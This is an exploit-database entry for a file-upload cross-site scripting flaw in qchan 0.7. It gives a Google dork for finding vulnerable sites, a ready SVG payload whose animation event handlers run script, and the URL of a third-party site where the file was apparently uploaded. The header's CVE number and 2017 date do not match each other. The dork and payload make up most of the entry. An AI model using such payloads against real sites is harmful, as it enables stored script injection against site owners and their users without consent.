Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2021-39893 | CWE-79 | $500 | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2017-12-30 |
============================================================================
| # Title : qchan 0.7 File upload XSS Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 Franais V.(Pro) |
| # Version : 0.7 |
| # Vendor : http://wmscripti.com/ |
| # Dork : Powered by Qchan 0.7 |
============================================================================
poc :
[+] Dorking n Google Or Other Search Enggine
[+] Save this code as test.svg :
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<circle id="indoushka" r="50" cx="100" cy="100" style="fill: #F00">
<set attributeName="fill" attributeType="CSS" onbegin='alert(1)' onend='alert(2)' to="#00F" begin="1s" dur="5s" />
</circle>
</defs>
<use xlink:href="#indoushka"/>
</svg>
[+] upload it .
http://shandian.free.yuny.pw/uploads/2017/12/test.svg
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================
Copyright ©2024 Exploitalert.